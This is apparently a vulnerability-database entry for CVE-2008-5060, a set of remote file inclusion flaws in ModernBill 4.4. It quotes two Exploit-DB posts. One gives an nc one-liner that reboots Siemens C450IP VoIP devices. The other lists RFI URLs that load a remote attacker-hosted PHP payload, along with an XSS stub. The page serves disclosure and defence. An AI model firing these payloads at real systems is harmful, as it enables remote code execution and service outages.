CVE-2008-5060
published 2008-11-13CVE-2008-5060: Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
3.79%
88.6th percentile
Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) export_batch.inc.php, (2) run_auto_suspend.cron.php, and (3) send_email_cache.php in include/scripts/; (4) include/misc/mod_2checkout/2checkout_return.inc.php; and (5) include/html/nettools.popup.php, different vectors than CVE-2006-4034 and CVE-2005-1054.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| modernbill | modernbill | <= 4.4 | — |
| modernbill | modernbill | <= 4.4.0 | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Siemens C450IP/C475IP - Remote Denial of Service
exploitdb·2008-11-24
CVE-2008-7065 Siemens C450IP/C475IP - Remote Denial of Service
Siemens C450IP/C475IP - Remote Denial of Service
---
Hi,
echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060
Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.
Tested with current firmwares.
Vendor (Siemens) was contacted 11/2007, no fix supplied yet.
Have phun!
sky & Any
# milw0rm.com [2008-11-24]
Exploit-DB
ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion
exploitdb·2008-10-31
CVE-2008-5060 ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion
ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion
---
ModernBill .:. Client Billing System - User Login
ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.
No writeups or analysis indexed.
http://secunia.com/advisories/32529http://securityreason.com/securityalert/4587https://exchange.xforce.ibmcloud.com/vulnerabilities/46513https://www.exploit-db.com/exploits/6916http://secunia.com/advisories/32529http://securityreason.com/securityalert/4587https://exchange.xforce.ibmcloud.com/vulnerabilities/46513https://www.exploit-db.com/exploits/6916
2008-11-13
Published